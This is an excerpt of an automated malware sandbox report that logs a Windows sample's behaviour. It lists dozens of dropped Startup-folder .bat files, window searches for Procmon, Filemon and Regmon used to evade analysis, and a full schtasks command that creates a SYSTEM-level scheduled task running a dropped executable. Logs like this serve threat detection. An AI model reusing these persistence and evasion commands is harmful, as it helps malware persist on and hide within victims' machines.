                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ABVMMLQpGhcp1W2ujjO04sLV.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fQToSS9BPvVcS8w6eNfcK0kY.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N7bW39nU2llZKhOZXueEFrfF.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DJXmw8FbD4RPPXhLeAm8SoVJ.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wfdWx9QBHbiX53OVW3ybKn3w.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cYTbNzYImrDYIx7DZ1mq8uju.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sPufcIhuWOPTECewJPFroVOs.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DCp8sgzWACD6Vy523F9IlcQB.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zEeQhGslvnDbo67JpIq1JJCf.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I1y6rl2pC8mUDNK8qfoy3mwi.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pc0fUYEqajLGUWQtn2ftxoqL.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UNhgzOtBFiyZVWZ3q4kFYqN6.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\r0iR2ukaNLwNYvPx5HIxG52l.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MLlWxWjkKRHHt42qJxZpv3D4.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kjmIHqcSIrCufgz14qWPPLBs.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7lgGvzEo7nECzBG3bpAxjivM.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WRO1mDUXRTjz6psEJDnxyxnx.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbcng22Z0TSdvpG3NMlJFqMM.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QJOvieJeRHqxL1CkBVqLAHn4.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WubC0DiuPPNp4xftV5ZUsBRa.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uh3nu45INFmWm7584kVwgFUO.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZZdfK51JZVeSwQUZVWqostT0.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DsmX5IKpf85YqLtUG2emopLQ.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jR7LsmZUnB4FZaCYUqyCsVgJ.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKepX7TNvoxrvNCU36z69Z8U.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u5dGk12YYILlpzhYxk2XzgEM.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8U1eBzGHaaLerzhFHg9U9VIJ.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6Lj2r8HjpXGeANxR3KECgncY.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\13YCUaamLsi0QOacTlyUtCF3.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tsbzRFmTsKBykEPO6dTSp6Bo.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cdlcSQxWa3EiYarbRMZZXW6B.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nqmQZESYWs8lMVQC5uSuvZGu.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xsTljUDyfomCxhnzNXfr7Xm9.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\YK212xIfnETeMj8HWzSaLpXm.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LlgTJb1fsKZaWWGOHpA0Z7jy.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X92VSFxhiRrhLMunkKi2h57u.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wpfphpa0v7Nt73NmqVDrheEB.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MeUXi1xZRfgTr34geRpmygtS.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dfqsmrq9YcEQ7hPoIyQgCVFc.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Gsl02wkLG0QjvXiDlgL1h1Gi.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JtkF0WemvMdybR3XRcsFyf1i.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t1VNoyGIaOw1GtxZ1M3tjpAQ.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\L66Dh4NdwdeMMxg3HjUpU2VV.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lfrK2eleGgknmu9FzWkpzB7c.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Zf29JQFSkkWOPzBYpym8uJAy.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RSzAVr1FmnmbHDkLIrabhsTB.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchWZdT95vOpzHp7On4mxxfQ.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Zg3gHfMVLuRw8ensa1FCPDaU.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wnPWh6gigyeyZklNGZd5SKHQ.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Yja9y4U3Z3AC8NiP5CTtr4Gt.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6xZdoDoBUE5p5eHQogOzmCAe.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t5Sezk8AJ1dVCIp8NlarOJfh.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LxHbHMNvefHp2Hvr6DcpzhYd.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MfQYCojjZujE183iHin4yvvN.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZboQ6QzDUJYdvbmW1ugLygi3.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qjWESUwN5QphEhjbuV2RyE3e.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rn8SDNMr1p6wepdx6lkoczBh.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ERBtXO5ho7nmZoFsGYVG8xKj.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KD5MxYvzde1avFdeWwU1rF85.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0tqRsZaQXhm54caqwDUXuMHC.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7BtjTi3FF9au1FQnlKymnDMg.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3rRyjClAJ2k30QIrWGpVFDpo.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JBjdJ2s3yN24CmoRslMpXshQ.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UsRuWQ7xN6FZn5at6gRKTF3B.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\A6qSF0ut9ErFpR3WVXzTlEB6.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XlekvkCI3kM0b7NtTDTdRwQu.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84qHSnAnloUyGTjudCcnx8X7.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6fMi9oyVvviqTTN6Wr56ISLB.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\913UuC1tRhVGy6AHxLqTaVLY.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SobxUGvoTK5M02dimGqnbluB.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tnYvJsdw6gVMo54pPIPOTk7f.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ljM3vcf9uuofRJ8ARCciU76L.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ra9dznGmjOHpZAiuMncAyjjm.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oNOt66EI4etu2JX94D2Yxd2b.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bzGR4bdGfx80t9z5gTXhjS5m.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BN2W9TNO6kL3gJzRRzdUbTZg.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v626yA0xMjbBDle6UIsKMxMX.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F2GuBTHnmBkN3dSsucJeBkQG.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HpILK5HtW16MD0UJ7pzV1QPJ.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bRXCsNtemAFBshpyVJXEffxd.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Yv6LDN6gTc8YJ8q14nqOwadt.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sS6m1zJ7SM7VOu619Ye9oRPC.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BosibbTKPcpK0gAFoIDe9sCf.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ylpTCbqw6Bd6MUStDnsoxMXB.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1hkcRBWLeEPqv2ntphnoy15W.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oZiUKJGSA8G9xcONfqSnC56U.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rVMvJuock0EvSLQr8i6oWa6o.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fagr44gehhmhQmsmZzIfzCC2.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\er4UWRAIc5nksPtzjAlnLniT.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TVAm1QI1IkUDwXuoaPmgOaGO.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8xb4CYcBawbLerlRgmQScw49.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c30OjsA06vP0OjpHU4TSEFXy.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\INQlUc1XgC4YubLIynK9wvrP.batJump to dropped file
                        Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeWindow searched: window name: FilemonClass
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeWindow searched: window name: RegmonClass
                        Source: C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exeWindow searched: window name: FilemonClass
                        Source: C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                        Source: C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exeWindow searched: window name: RegmonClass
                        Source: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exeWindow searched: window name: FilemonClass
                        Source: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                        Source: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exeWindow searched: window name: RegmonClass
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeWindow searched: window name: RegmonClass
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeWindow searched: window name: FilemonClass
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                        Uses schtasks.exe or at.exe to add and modify task schedules
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 21:38:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe\" em /VNsite_idnLd 385118 /S" /V1 /F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ECVVQonpjDvaVVq8u9A57jpg.batJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeFile created: C:\Windows\Tasks\bWycNackLSywaqkmgR.job
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ECVVQonpjDvaVVq8u9A57jpg.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u4wmr0Bf4EXaMCuRI7IEqrEN.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JlRLEIpF3kijytHz1FaeY3WZ.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Gsl02wkLG0QjvXiDlgL1h1Gi.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JtkF0WemvMdybR3XRcsFyf1i.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchWZdT95vOpzHp7On4mxxfQ.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Zg3gHfMVLuRw8ensa1FCPDaU.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rn8SDNMr1p6wepdx6lkoczBh.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UsRuWQ7xN6FZn5at6gRKTF3B.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\A6qSF0ut9ErFpR3WVXzTlEB6.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v626yA0xMjbBDle6UIsKMxMX.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ylpTCbqw6Bd6MUStDnsoxMXB.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rVMvJuock0EvSLQr8i6oWa6o.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fagr44gehhmhQmsmZzIfzCC2.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c30OjsA06vP0OjpHU4TSEFXy.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\INQlUc1XgC4YubLIynK9wvrP.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DsmX5IKpf85YqLtUG2emopLQ.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jR7LsmZUnB4FZaCYUqyCsVgJ.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u5dGk12YYILlpzhYxk2XzgEM.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cdlcSQxWa3EiYarbRMZZXW6B.batJump to behavior
